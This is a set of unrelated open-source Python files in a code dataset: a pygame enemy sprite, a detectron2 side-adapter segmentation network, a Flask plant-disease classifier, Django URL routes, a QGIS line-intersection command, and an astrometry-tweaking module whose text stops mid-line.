import*\nENEMYTRI = pygame.image.load('enemytri.png')\nclass enemyt(pygame.sprite.Sprite):\n #Initialize the attributes related to the trex's position (x and y coords), image, and rectangle hitbox\n def __init__(self):\n #Calls the Sprite class constructor.\n #It must be the first line in constructor.\n super().__init__()\n #add something to this function to what you have in trex.py\n self.image = ENEMYTRI\n self.rect = pygame.Rect(180,180,25,25)\n self.rect.x = 180\n self.rect.y = 180\n #Don't forget to add rect and image attributes!\n\n #Changes the cactus's horizontal location\n '''def move(self):\n if self.rect.x > -100:\n self.rect.x = self.rect.x-5\n self.rect.x = self.rect.x\n self.rect.y = 200\n elif self.rect.x <= -100:\n self.rect.x = 500'''\n","repo_name":"jsmith2020/Worldshardestgame-","sub_path":"enemytri.py","file_name":"enemytri.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"7245456456","text":"import logging\nfrom functools import partial\nfrom typing import Dict, List, Tuple\n\nimport torch\nfrom detectron2.config import configurable\nfrom detectron2.layers import ShapeSpec\nfrom detectron2.utils.logger import log_first_n\nfrom detectron2.utils.registry import Registry\nfrom timm import create_model\nfrom timm.models.vision_transformer import VisionTransformer\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom ..layers import MLP, build_fusion_layer\nfrom .timm_wrapper import PatchEmbed\n\nSIDE_ADAPTER_REGISTRY = Registry(\"SIDE_ADAPTER\")\nSIDE_ADAPTER_REGISTRY.__doc__ = \"\"\"\nRegistry for side adapter.\n\"\"\"\n\n\ndef build_side_adapter_network(cfg, input_shape):\n name = cfg.MODEL.SIDE_ADAPTER.NAME\n return SIDE_ADAPTER_REGISTRY.get(name)(cfg, input_shape)\n\n\nclass MLPMaskDecoder(nn.Module):\n def __init__(\n self,\n *,\n in_channels: int,\n total_heads: int = 1,\n total_layers: int = 1,\n embed_channels: int = 256,\n mlp_channels: int = 256,\n mlp_num_layers: int = 3,\n rescale_attn_bias: bool = False,\n ):\n super().__init__()\n self.total_heads = total_heads\n self.total_layers = total_layers\n\n dense_affine_func = partial(nn.Conv2d, kernel_size=1)\n # Query Branch\n self.query_mlp = MLP(in_channels, mlp_channels, embed_channels, mlp_num_layers)\n # Pixel Branch\n self.pix_mlp = MLP(\n in_channels,\n mlp_channels,\n embed_channels,\n mlp_num_layers,\n affine_func=dense_affine_func,\n )\n # Attention Bias Branch\n self.attn_mlp = MLP(\n in_channels,\n mlp_channels,\n embed_channels * self.total_heads * self.total_layers,\n mlp_num_layers,\n affine_func=dense_affine_func,\n )\n if rescale_attn_bias:\n self.bias_scaling = nn.Linear(1, 1)\n else:\n self.bias_scaling = nn.Identity()\n\n def forward(\n self, query: torch.Tensor, x: torch.Tensor\n ) -> Tuple[torch.Tensor, List[torch.Tensor]]:\n # query: [B,N,C]\n # x: [B,C,H,W]\n query = self.query_mlp(query)\n pix = self.pix_mlp(x)\n b, c, h, w = pix.shape\n # preidict mask\n mask_preds = torch.einsum(\"bqc,bchw->bqhw\", query, pix)\n # generate attn bias\n attn = self.attn_mlp(x)\n attn = attn.reshape(b, self.total_layers, self.total_heads, c, h, w)\n attn_bias = torch.einsum(\"bqc,blnchw->blnqhw\", query, attn)\n attn_bias = self.bias_scaling(attn_bias[..., None]).squeeze(-1)\n attn_bias = attn_bias.chunk(self.total_layers, dim=1)\n attn_bias = [attn.squeeze(1) for attn in attn_bias]\n return mask_preds, attn_bias\n\n\n@SIDE_ADAPTER_REGISTRY.register()\nclass RegionwiseSideAdapterNetwork(nn.Module):\n @configurable\n def __init__(\n self,\n vit_model: VisionTransformer,\n fusion_layers: nn.ModuleList,\n mask_decoder: nn.Module,\n num_queries: int,\n fusion_map: Dict[int, int],\n deep_supervision_idxs: List[int],\n ):\n super().__init__()\n # remove cls token\n if vit_model.cls_token is not None:\n vit_model.pos_embed = nn.Parameter(vit_model.pos_embed[:, 1:, ...])\n del vit_model.cls_token\n vit_model.cls_token = None\n # delete out norm\n del vit_model.norm\n vit_model.norm = nn.Identity()\n self.vit_model = vit_model\n\n self.num_queries = num_queries\n self.num_features = vit_model.num_features\n # add query token\n self.query_embed = nn.Parameter(torch.zeros(1, num_queries, self.num_features))\n self.query_pos_embed = nn.Parameter(\n torch.zeros(1, num_queries, self.num_features)\n )\n nn.init.normal_(self.query_embed, std=0.02)\n nn.init.normal_(self.query_pos_embed, std=0.02)\n self.fusion_layers = fusion_layers\n self.fusion_map = fusion_map\n self.mask_decoder = mask_decoder\n # for training\n self.deep_supervision_idxs = deep_supervision_idxs\n\n @classmethod\n def from_config(cls, cfg, input_shape: Dict[str, ShapeSpec]):\n vit = create_model(\n cfg.MODEL.SIDE_ADAPTER.VIT_NAME,\n cfg.MODEL.SIDE_ADAPTER.PRETRAINED,\n img_size=cfg.MODEL.SIDE_ADAPTER.IMAGE_SIZE,\n drop_path_rate=cfg.MODEL.SIDE_ADAPTER.DROP_PATH_RATE,\n fc_norm=False,\n num_classes=0,\n embed_layer=PatchEmbed,\n )\n # [\"0->0\",\"3->1\",\"6->2\",\"9->3\"]\n fusion_map: List[str] = cfg.MODEL.SIDE_ADAPTER.FUSION_MAP\n\n x2side_map = {int(j): int(i) for i, j in [x.split(\"->\") for x in fusion_map]}\n # build fusion layers\n fusion_type: str = cfg.MODEL.SIDE_ADAPTER.FUSION_TYPE\n fusion_layers = nn.ModuleDict(\n {\n f\"layer_{tgt_idx}\": build_fusion_layer(\n fusion_type, input_shape[src_idx].channels, vit.num_features\n )\n for tgt_idx, src_idx in x2side_map.items()\n }\n )\n # build mask decoder\n return {\n \"vit_model\": vit,\n \"num_queries\": cfg.MODEL.SIDE_ADAPTER.NUM_QUERIES,\n \"fusion_layers\": fusion_layers,\n \"fusion_map\": x2side_map,\n \"mask_decoder\": MLPMaskDecoder(\n in_channels=vit.num_features,\n total_heads=cfg.MODEL.SIDE_ADAPTER.ATTN_BIAS.NUM_HEADS,\n total_layers=cfg.MODEL.SIDE_ADAPTER.ATTN_BIAS.NUM_LAYERS,\n embed_channels=cfg.MODEL.SIDE_ADAPTER.ATTN_BIAS.EMBED_CHANNELS,\n mlp_channels=cfg.MODEL.SIDE_ADAPTER.ATTN_BIAS.MLP_CHANNELS,\n mlp_num_layers=cfg.MODEL.SIDE_ADAPTER.ATTN_BIAS.MLP_NUM_LAYERS,\n rescale_attn_bias=cfg.MODEL.SIDE_ADAPTER.ATTN_BIAS.RESCALE_ATTN_BIAS,\n ),\n \"deep_supervision_idxs\": cfg.MODEL.SIDE_ADAPTER.DEEP_SUPERVISION_IDXS,\n }\n\n def forward(\n self, image: torch.Tensor, clip_features: List[torch.Tensor]\n ) -> Dict[str, List[torch.Tensor]]:\n features = self.forward_features(image, clip_features)\n return self.decode_masks(features)\n\n def decode_masks(\n self, features: List[Dict[str, torch.Tensor]]\n ) -> Tuple[List[torch.Tensor], List[List[torch.Tensor]]]:\n if not self.training:\n features = [features[-1]]\n mask_preds = []\n attn_biases = []\n for feature in features:\n mask_pred, attn_bias = self.mask_decoder(**feature)\n mask_preds.append(mask_pred)\n attn_biases.append(attn_bias)\n return mask_preds, attn_biases\n\n def forward_features(\n self, image: torch.Tensor, clip_features: List[torch.Tensor]\n ) -> List[Dict[str, torch.Tensor]]:\n x, (h, w) = self.vit_model.patch_embed(image)\n L = x.shape[1] # token length\n pos_embed = self.vit_model.pos_embed\n ori_h, ori_w = self.vit_model.patch_embed.grid_size\n if pos_embed.shape[1] != L:\n pos_embed = (\n F.interpolate(\n pos_embed.reshape(1, ori_h, ori_w, -1).permute(0, 3, 1, 2),\n size=[h, w],\n mode=\"bicubic\",\n align_corners=False,\n )\n .flatten(2)\n .permute(0, 2, 1)\n )\n pos_embed = torch.cat(\n [self.query_pos_embed.expand(pos_embed.shape[0], -1, -1), pos_embed], dim=1\n )\n x = torch.cat(\n [self.query_embed.expand(x.shape[0], -1, -1), x],\n dim=1,\n ) # B, Q+L, C\n x = x + pos_embed\n x = self.vit_model.norm_pre(x)\n x = self.fuse(0, x, clip_features, (h, w))\n outs = []\n for i, blk in enumerate(self.vit_model.blocks, start=1):\n x = blk(x)\n x = self.fuse(i, x, clip_features, (h, w))\n if i in self.deep_supervision_idxs:\n outs.append(\n {\n \"query\": x[:, :-L, ...],\n \"x\": x[:, -L:, ...]\n .permute(0, 2, 1)\n .reshape(x.shape[0], x.shape[-1], h, w),\n }\n )\n\n if i < len(self.vit_model.blocks):\n x = x + pos_embed\n\n return outs\n\n def fuse(\n self,\n block_idx: int,\n x: torch.Tensor,\n clip_features: List[torch.Tensor],\n spatial_shape: Tuple[int, int],\n ) -> torch.Tensor:\n if block_idx in self.fusion_map:\n src_idx = self.fusion_map[block_idx]\n L = spatial_shape[0] * spatial_shape[1]\n x = torch.cat(\n [\n x[:, :-L, ...],\n self.fusion_layers[f\"layer_{block_idx}\"](\n x[:, -L:, ...], clip_features[src_idx], spatial_shape\n ),\n ],\n dim=1,\n )\n log_first_n(\n logging.INFO,\n f\"fuse clip {src_idx} to {block_idx}\",\n len(self.fusion_map),\n )\n return x\n","repo_name":"MendelXu/SAN","sub_path":"san/model/side_adapter/side_adapter.py","file_name":"side_adapter.py","file_ext":"py","file_size_in_byte":9213,"program_lang":"python","lang":"en","doc_type":"code","stars":214,"dataset":"github-code","pt":"29"} +{"seq_id":"36701265731","text":"from flask import Flask,request,jsonify,render_template\nfrom collections import OrderedDict\nimport os\nimport torch\nfrom torchvision import models,transforms\nimport numpy as np\nfrom PIL import Image\nimport io\nimport face_recognition\nimport cv2\nimport face_recognition\nfrom torch import nn\n# import six.moves.urllib as urllib\nimport sys\n\n# import tensorflow as tf\n\n\nfrom collections import defaultdict\nfrom io import StringIO\n# from matplotlib import pyplot as plt\n\nfrom PIL import Image\n# from object_detection.utils import label_map_util\n# from object_detection.utils import visualization_utils as vis_util\n\n\ndevice = torch.device('cpu')\n\ndef transform_image(image_bytes):\n my_transforms = transforms.Compose([transforms.RandomRotation(45),\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], \n [0.229, 0.224, 0.225])])\n image = Image.open(io.BytesIO(image_bytes))\n return my_transforms(image).unsqueeze(0)\n\n\ndef predict_transfer(image,model):\n # load the image and return the predicted breed\n# mean_train_set,std_train_set = [0.487,0.467,0.397],[0.235,0.23,0.23]\n \n# image_transforms= transforms.Compose([transforms.Resize(256),\n# transforms.CenterCrop(224),\n# transforms.ToTensor(),\n# transforms.Normalize(mean_train_set,std_train_set)])\n image_tensor = transform_image(image)\n# image_tensor.unsqueeze_(0)\n# if use_cuda:\n# image_tensor = image_tensor.cuda()\n model.eval()\n model.to(device)\n image_tensor.to(device)\n output = model(image_tensor)\n _,class_idx=torch.max(output, 1)\n \n class_name={0: 'Apple___Apple_scab',\n 1: 'Apple___Black_rot',\n 2: 'Apple___Cedar_apple_rust',\n 3: 'Apple___healthy',\n 4: 'Blueberry___healthy',\n 5: 'Cherry_(including_sour)___Powdery_mildew',\n 6: 'Cherry_(including_sour)___healthy',\n 7: 'Corn_(maize)___Cercospora_leaf_spot Gray_leaf_spot',\n 8: 'Corn_(maize)___Common_rust_',\n 9: 'Corn_(maize)___Northern_Leaf_Blight',\n 10: 'Corn_(maize)___healthy',\n 11: 'Grape___Black_rot',\n 12: 'Grape___Esca_(Black_Measles)',\n 13: 'Grape___Leaf_blight_(Isariopsis_Leaf_Spot)',\n 14: 'Grape___healthy',\n 15: 'Orange___Haunglongbing_(Citrus_greening)',\n 16: 'Peach___Bacterial_spot',\n 17: 'Peach___healthy',\n 18: 'Pepper,_bell___Bacterial_spot',\n 19: 'Pepper,_bell___healthy',\n 20: 'Potato___Early_blight',\n 21: 'Potato___Late_blight',\n 22: 'Potato___healthy',\n 23: 'Raspberry___healthy',\n 24: 'Soybean___healthy',\n 25: 'Squash___Powdery_mildew',\n 26: 'Strawberry___Leaf_scorch',\n 27: 'Strawberry___healthy',\n 28: 'Tomato___Bacterial_spot',\n 29: 'Tomato___Early_blight',\n 30: 'Tomato___Late_blight',\n 31: 'Tomato___Leaf_Mold',\n 32: 'Tomato___Septoria_leaf_spot',\n 33: 'Tomato___Spider_mites Two-spotted_spider_mite',\n 34: 'Tomato___Target_Spot',\n 35: 'Tomato___Tomato_Yellow_Leaf_Curl_Virus',\n 36: 'Tomato___Tomato_mosaic_virus',\n 37: 'Tomato___healthy'}\n return class_name[int(class_idx)]\n\n\napp = Flask(__name__, static_url_path='/static')\n\n@app.route('/')\ndef home():\n\treturn render_template(\"index.html\")\n\n\n@app.route('/about')\ndef render_about_page():\n\treturn render_template('about.html')\n\n# @app.route(\"/upload-image\", methods=[\"GET\", \"POST\"])\n# def upload_image():\n@app.route('/uploadajax',methods=['POST'])\ndef upload_file():\n\tif request.method == \"POST\":\n\t\tif request.files:\n\t\t\timage = request.files[\"file\"]\n\t\t\timage_bytes = image.read()\n\t\t\timage_extensions=['ras', 'xwd', 'bmp', 'jpe', 'jpg', 'jpeg', 'xpm', 'ief', 'pbm', 'tif', 'gif', 'ppm', 'xbm', 'tiff', 'rgb', 'pgm', 'png', 'pnm']\n\t\t\tdevice = torch.device('cpu')\n\t\t\tmodel = models.densenet121(pretrained=True)\n\t\t\tclassifier = nn.Sequential(OrderedDict([\n ('fc1', nn.Linear(1024, 500)),\n ('relu', nn.ReLU()),\n ('drop1',nn.Dropout(p=0.5)),\n ('fc2', nn.Linear(500, 38)),\n ('output', nn.LogSoftmax(dim=1))\n ]))\n\t\t\tmodel.classifier = classifier\n\t\t\tmodel.load_state_dict(torch.load(\"Model/model_plant_modified.pt\",map_location=device))\n\t\t\t\n# \t\t\tmodel = torch.load(\"Model/model_plant.pt\",map_location=device)\n\t\t\tdisease = predict_transfer(image_bytes,model)\n\t\t\treturn jsonify('This a disease picture of:{}'.format(disease))\n# \t\t\tmodel = torch.load(\"Model/model_plant.pt\")\n\t\t\n\n \n \n\n\t\t\t\n\n# \t\timage = request.files[\"image\"]\n\t\t\t\n \t\t\t\n\t\t\t\n# \tif request.method == \"POST\":\n# \t\tfile = request.files['image']\n \t\t\t\n# \t\t\tif image.filename.split('.')[1] not in image_extensions:\n# \t\t\t\treturn jsonify('Please upload an appropriate image file')\n\n\t\n# \t\t\timage_bytes = image.read()\n# \t\t\tpil_image = Image.open(io.BytesIO(image_bytes))\n \n# \t\t\tnparr = np.frombuffer(image_bytes, np.uint8)\n# \t\t\timg_np = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n \n \n# \t\tdisease = predict_transfer(pil_image,model)\n \t\n \n \n\t\n\t\n\n\n\nif __name__ == '__main__':\n app.run(debug=False,port=os.getenv('PORT',5000))\n\n","repo_name":"VIKGO123/Plant-Disease-Recoginition","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"28929358083","text":"from django.urls import path\n\nfrom django.contrib import admin\nfrom django.conf.urls import url\nfrom MyBook import views,forms\n\nfrom django.conf import settings\nfrom django.views.static import serve\nfrom django.conf.urls import include\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^index/$',views.home),\n url(r'^([0-9]+)/$',views.details,name='details'),\n url(r'^details/([0-9]+)/$',views.delete,name='delete'),\n\n url(r'^ajouter/([0-9]+)/$',forms.UpdateView.as_view(),name='update'),\n url(r'^user/(\\w+)/$', views.profile, name='profile'),\n url(r'^ajouter/$', views.ajouter, name='ajouter'),\n url(r'^ajouter/back/$',views.back,name=\"back\"),\n url(r'^$',views.login_view,name='login'),\n url(r'^logout/$',views.logout_view,name='logout'),\n url(r'^like_book/$', views.like_book, name='like_book'),\n\n\n\n\n url(r'^update/(\\d+)/$', views.Bookupdate,name=\"update\"),\n url(r'^signIn/$',views.signIn,name=\"signIn\"),\n url(r'^user_list/$', views.user_list, name='user_list'),\n url(r'^user_update/([0-9]+)/$', views.User_update, name='User_update'),\n url(r'^user_list/([0-9]+)/$',views.delete_user,name='delete_user'),\n url(r'^user_search$', views.user_search, name=\"user_search\"),\n url(r'^user_add$', views.user_add, name=\"user_add\"),\n url(r'user_search', views.user_search, name='user_search'),\n url(r'borrow/([0-9]+)/$', views.book_borrow, name='book_borrow'),\n url(r'return/([0-9]+)/$', views.book_return, name='book_return'),\n url(r'comment/([0-9]+)/$', views.book_comment, name='book_comment'),\n\n]\n\n\n","repo_name":"Mokhleshamdi/openBooks","sub_path":"MyBook/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"16233324895","text":"# -*- coding: utf-8 -*-\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom qgis.core import *\nfrom qgis.gui import *\nimport processing\nimport os\nimport tempfile\nimport shutil\n\nfrom messagebarutils import MessageBarUtils\nimport vectorlayerutils\nimport constants\n\nclass IntersectCommand(object):\n \n def __init__(self, iface):\n self.iface = iface\n self.messageBarUtils = MessageBarUtils(iface)\n \n def run(self):\n self.layer = self.iface.legendInterface().currentLayer()\n \n if self.layer.isModified():\n self.messageBarUtils.showMessage(\"Intersect\", \"Commit current changes in layer before running this command.\", \n QgsMessageBar.CRITICAL, duration=5)\n return\n \n if self.layer.selectedFeatureCount() == 0:\n self.messageBarUtils.showYesCancel(\"Intersect\", \"No feature selected in Layer %s. Proceed on full layer?\" % self.layer.name(), \n QgsMessageBar.WARNING, self.intersect)\n return\n \n # run directly without asking anything\n self.intersect()\n \n def intersect(self):\n self.layer.beginEditCommand(\"Intersect\")\n \n tempDir = None\n try:\n self.iface.mapCanvas().freeze(True)\n \n if self.layer.selectedFeatureCount() > 0:\n selected=True\n concernedFids = self.layer.selectedFeaturesIds()\n else:\n concernedFids = self.layer.allFeatureIds()\n selected=False\n \n \n tempDir = tempfile.mkdtemp()\n shpPath = os.path.join(tempDir, \"temp.shp\")\n # not really necessary if no selection....\n QgsVectorFileWriter.writeAsVectorFormat(self.layer, shpPath, self.layer.dataProvider().encoding(), \n self.layer.crs(), onlySelected=selected)\n \n # here run own implementation of intersection instead of v:clean break => v.clean break applies a threshold\n # that merges vertices closer than 10^-4 to each other (no matter the unit), which is a problem for \n # goographic coordinates (10^-4 deg ~ 100m at equator). Possible to reproject instead but intersections not exactly where\n # they would have been (line in WGS84 is not a line in Mercator but reproject only reprojects the endpoint) \n # and someone would have complained (even though at the scale we work at; it would have been a distortion < 1mmm)\n # To consider if the method below is too slow...\n layer = QgsVectorLayer(shpPath, \"Temp\", \"ogr\")\n \n self.iface.mainWindow().statusBar().showMessage(\"Layer Intersection\")\n \n layer.startEditing()\n vectorlayerutils.layerIntersection(layer)\n layer.commitChanges() \n \n self.iface.mainWindow().statusBar().showMessage(\"v.clean snap\")\n \n # v.clean Snap\n # will make sure the nodes snapped to a segment are taken into account\n # tolerance set to close to floating precision\n output = processing.runalg(\"grass:v.clean\",layer,1,constants.TOLERANCE_DEGREE,None,-1,0.0001,None,None)\n outputLayer = output['output']\n \n # here selection has been lost but not a problem in practice\n \n \n self.iface.mainWindow().statusBar().showMessage(\"v.clean rmdupl\")\n \n # v.clean rmdupl\n output = processing.runalg(\"grass:v.clean\",outputLayer,6,0,None,-1,0.0001,None,None)\n outputLayer = output['output']\n \n \n self.iface.mainWindow().statusBar().showMessage(\"v.clean rmline\")\n \n # v.clean rmline\n output = processing.runalg(\"grass:v.clean\",outputLayer,11,0,None,-1,0.0001,None,None)\n outputLayer = output['output']\n \n outputLayer = QgsVectorLayer(outputLayer, \"Repr\", \"ogr\")\n \n self.iface.mainWindow().statusBar().showMessage(\"output\")\n \n # copy output features\n count = outputLayer.featureCount()\n qDebug(\"Count %d\" % count)\n if count == 0:\n self.messageBarUtils.showMessage(\"Intersect\", \"No feature output.\", QgsMessageBar.WARNING, duration=5)\n else:\n # delete original selected features\n for featureId in concernedFids:\n self.layer.deleteFeature(featureId)\n \n for feature in outputLayer.getFeatures():\n geom = feature.geometry()\n feature.setGeometry(geom)\n self.layer.addFeature(feature)\n if selected:\n self.layer.select(feature.id())\n \n del outputLayer\n \n except Exception as e:\n QgsMessageLog.logMessage(repr(e))\n self.messageBarUtils.removeAllMessages()\n self.messageBarUtils.showMessage(\"Intersect\", \"There was an error performing this command. See QGIS Message log for details.\", \n QgsMessageBar.CRITICAL, duration=5)\n \n self.layer.destroyEditCommand()\n \n return\n finally:\n if tempDir:\n shutil.rmtree(tempDir, True)\n self.iface.mapCanvas().freeze(False)\n self.iface.mapCanvas().refresh()\n \n self.messageBarUtils.showMessage(\"Intersect\", \"Success\", duration=5)\n \n self.layer.endEditCommand()\n \n","repo_name":"gvellut/GVDigitizingTools","sub_path":"intersect.py","file_name":"intersect.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"27512381912","text":"# Code by Lachlan Marnoch, 2019\n\nfrom astropy import table\nfrom astropy.io import fits\nfrom astropy import wcs\nfrom astropy.coordinates import SkyCoord\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom craftutils import fits_files as ff\nfrom craftutils import params as p\nfrom craftutils import utils as u\nfrom craftutils import plotting as pl\n\nfrom typing import Union\n\n\ndef calculate_error_ellipse(frb: Union[str, dict], error: str = 'quadrature'):\n \"\"\"\n Calculates the parameters of the uncertainty ellipse of an FRB, for use in plotting.\n :param frb: Either a string specifying the FRB, which must have a corresponding .yaml file in /param/FRBs, or a\n dictionary containing the same information.\n :param error: String specifying the type of error calculation to use. Available options are 'quadrature', which\n provides the quadrature sum of statistical and systematic uncertainty; 'systematic'; and 'statistical'.\n :return: (a, b, theta) as floats in a tuple, in units of degrees.\n \"\"\"\n if error == 'quadrature':\n\n if type(frb) is str:\n frb = p.object_params_frb(frb)\n\n if frb['burst_err_stat_a'] == 0.0 or frb['burst_err_stat_b'] == 0.0:\n\n ra_frb = frb['burst_dec']\n dec_frb = frb['burst_dec']\n\n ra_stat = frb['burst_err_stat_ra']\n ra_sys = frb['burst_err_sys_ra']\n ra = np.sqrt(ra_stat ** 2 + ra_sys ** 2)\n\n a = SkyCoord(f'0h0m0s {dec_frb}d').separation(SkyCoord(f'0h0m{ra}s {dec_frb}d')).value\n\n dec_stat = frb['burst_err_stat_dec'] / 3600\n dec_sys = frb['burst_err_sys_dec'] / 3600\n dec = np.sqrt(dec_stat ** 2 + dec_sys ** 2)\n b = SkyCoord(f'{ra_frb}d {dec_frb}d').separation(SkyCoord(f'{ra_frb}d {dec_frb + dec}d')).value\n\n theta = 0.0\n\n else:\n\n a_stat = frb['burst_err_stat_a']\n a_sys = frb['burst_err_sys_a']\n a = np.sqrt(a_stat ** 2 + a_sys ** 2) / 3600\n\n b_stat = frb['burst_err_stat_b']\n b_sys = frb['burst_err_sys_b']\n b = np.sqrt(b_stat ** 2 + b_sys ** 2) / 3600\n\n theta = frb['burst_err_theta']\n\n elif error == 'systematic':\n\n if frb['burst_err_stat_a'] == 0.0 or frb['burst_err_stat_b'] == 0.0:\n\n ra_frb = frb['burst_dec']\n dec_frb = frb['burst_dec']\n\n ra_sys = frb['burst_err_sys_ra']\n\n a = SkyCoord(f'0h0m0s {dec_frb}d').separation(SkyCoord(f'0h0m{ra_sys}s {dec_frb}d')).value\n\n dec_sys = frb['burst_err_sys_dec'] / 3600\n b = SkyCoord(f'{ra_frb}d {dec_frb}d').separation(SkyCoord(f'{ra_frb}d {dec_frb + dec_sys}d')).value\n\n theta = 0.0\n\n else:\n a = frb['burst_err_sys_a'] / 3600\n b = frb['burst_err_sys_b'] / 3600\n theta = frb['burst_err_theta']\n\n elif error == 'statistical':\n\n if frb['burst_err_stat_a'] == 0.0 or frb['burst_err_stat_b'] == 0.0:\n\n ra_frb = frb['burst_dec']\n dec_frb = frb['burst_dec']\n\n ra_stat = frb['burst_err_stat_ra']\n\n a = SkyCoord(f'0h0m0s {dec_frb}d').separation(SkyCoord(f'0h0m{ra_stat}s {dec_frb}d')).value\n\n dec_stat = frb['burst_err_stat_dec'] / 3600\n b = SkyCoord(f'{ra_frb}d {dec_frb}d').separation(SkyCoord(f'{ra_frb}d {dec_frb + dec_stat}d')).value\n\n theta = 0.0\n\n else:\n a = frb['burst_err_stat_a'] / 3600\n b = frb['burst_err_stat_b'] / 3600\n theta = frb['burst_err_theta']\n\n else:\n raise ValueError('error type not recognised.')\n\n # print(a * 3600)\n # print(b * 3600)\n\n return a, b, theta\n\n\ndef offset_astrometry(hdu: fits.hdu, offset_ra: float, offset_dec: float, output: str):\n \"\"\"\n Offsets the astrometric solution of a fits HDU by the specified amounts.\n :param hdu: Astropy HDU object to be offset.\n :param offset_ra: Amount to offset Right Ascension by, in degrees.\n :param offset_dec: Amount to offset Declination by, in degrees.\n :param output: String specifying the output directory.\n :return:\n \"\"\"\n hdu, path = ff.path_or_hdu(hdu)\n print(offset_ra, offset_dec)\n print('Writing tweaked file to:')\n print('\\t', output)\n print(hdu[0].header['CRVAL1'], hdu[0].header['CRVAL2'])\n hdu[0].header['CRVAL1'] = hdu[0].header['CRVAL1'] - offset_ra\n hdu[0].header['CRVAL2'] = hdu[0].header['CRVAL2'] - offset_dec\n print(hdu[0].header['CRVAL1'], hdu[0].header['CRVAL2'])\n\n hdu.writeto(output, overwrite=True)\n\n if path:\n hdu.close()\n\n return hdu\n\n\ndef tweak(sextractor_path: str, destination: str, image_path: str, cat_path: str, cat_name: str, tolerance: float = 10.,\n show: bool = False,\n stars_only: bool = False,\n manual: bool = False, offset_x: float = None, offset_y: float = None, offsets_world: bool = False,\n psf: bool = True,\n specific_star: bool = False, star_ra: float = None, star_dec: float = None\n ):\n \"\"\"\n For tweaking the astrometric solution of a fits image using a catalogue; either matches as many stars as possible\n and uses the median offset, uses a single star at a specified position (specific_star=True) or a manual offset.\n :param sextractor_path: Path to SExtractor-generated catalogue.\n :param destination: Directory to write tweaked image to.\n :param image_path: Path to image FITS file\n :param cat_path: Path to file containing catalogue.\n :param cat_name: Name of catalogue used.\n :param tolerance: Tolerance, in pixels, within which matches will be accepted.\n :param show: Plot matches onscreen?\n :param stars_only: Only match using stars, determined using SExtractor's 'class_star' output.\n :param manual: Use manual offset?\n :param offset_x: Offset in x to use; only if 'manual' is set to True.\n :param offset_y: Offset in y to use; only if 'manual' is set to True.\n :param offsets_world: If True, interprets the offsets as being given in World Coordinates (RA and DEC)\n :param psf: Use the PSF-fitting position?\n :param specific_star: Use a specific star to tweak? This means, instead of finding the closest matches for many\n stars, alignment is attempted with a single star nearest the given position.\n :param star_ra: Right Ascension of star for single-star alignment.\n :param star_dec: Declination of star for single-star alignment.\n :return: None\n \"\"\"\n param_dict = {}\n\n print(image_path)\n image = fits.open(image_path)\n header = image[0].header\n data = image[0].data\n\n wcs_info = wcs.WCS(header=header)\n # Set the appropriate column names depending on the format of the catalogue to use.\n if cat_name == 'DES':\n ra_name = 'RA'\n dec_name = 'DEC'\n elif cat_name == 'Gaia' or cat_name == 'SDSS':\n ra_name = 'ra'\n dec_name = 'dec'\n else:\n if psf:\n ra_name = 'ra_psf'\n dec_name = 'dec_psf'\n else:\n ra_name = 'ra'\n dec_name = 'dec'\n\n if psf:\n names = p.sextractor_names_psf()\n sextractor_ra_name = 'ra_psf'\n sextractor_dec_name = 'dec_psf'\n\n else:\n names = p.sextractor_names()\n sextractor_ra_name = 'ra'\n sextractor_dec_name = 'dec'\n\n if show or not manual:\n if cat_name == 'SExtractor':\n cat = table.Table(np.genfromtxt(cat_path, names=names))\n else:\n cat = table.Table()\n cat = cat.read(cat_path, format='ascii.csv')\n\n sextracted = table.Table(np.genfromtxt(sextractor_path, names=names))\n if stars_only:\n sextracted = sextracted[sextracted['class_star'] > 0.9]\n\n cat['x'], cat['y'] = wcs_info.all_world2pix(cat[ra_name], cat[dec_name], 0)\n x, y = wcs_info.all_world2pix(sextracted[sextractor_ra_name], sextracted[sextractor_dec_name], 0)\n\n norm = pl.nice_norm(data)\n if show:\n # plt.subplot(projection=wcs_info)\n plt.imshow(data, norm=norm, origin='lower', cmap='viridis')\n plt.scatter(x, y, label='SExtractor', c='violet')\n plt.scatter(cat['x'], cat['y'], label=cat_name, c='red')\n plt.legend()\n plt.title('Pre-Correction')\n plt.show()\n\n if manual:\n\n if offset_x is not None and offset_y is not None:\n\n if not offsets_world:\n\n scale_ra, scale_dec = ff.get_pixel_scale(image)\n\n offset_ra = -offset_x * abs(scale_ra)\n offset_dec = -offset_y * abs(scale_dec)\n\n print(offset_x, offset_y)\n\n else:\n\n offset_ra = offset_x\n offset_dec = offset_y\n\n else:\n\n print('Set offsets in epoch .yaml file')\n\n offset_ra = offset_dec = None\n\n elif specific_star:\n\n if star_ra is not None and star_dec is not None:\n print(star_ra, star_dec)\n star_cat, d = u.find_object(x=star_ra, y=star_dec, x_search=cat[ra_name], y_search=cat[dec_name])\n print('MD:', d)\n star_cat = cat[star_cat]\n star_sex, d = u.find_object(x=star_ra, y=star_dec, x_search=sextracted[sextractor_ra_name],\n y_search=sextracted[sextractor_dec_name])\n print('MD:', d)\n star_sex = sextracted[star_sex]\n offset_ra = (star_sex[sextractor_ra_name] - star_cat[ra_name])\n offset_dec = (star_sex[sextractor_dec_name] - star_cat[dec_name])\n else:\n raise ValueError('If doing specific_star, must specify star_ra and star_dec')\n\n else:\n\n match_ids, match_ids_cat = u.match_cat(x_match=sextracted['x'], y_match=sextracted['y'],\n x_cat=cat['x'],\n y_cat=cat['y'], tolerance=tolerance)\n\n sextracted = sextracted[match_ids]\n cat = cat[match_ids_cat]\n\n offsets_ra = 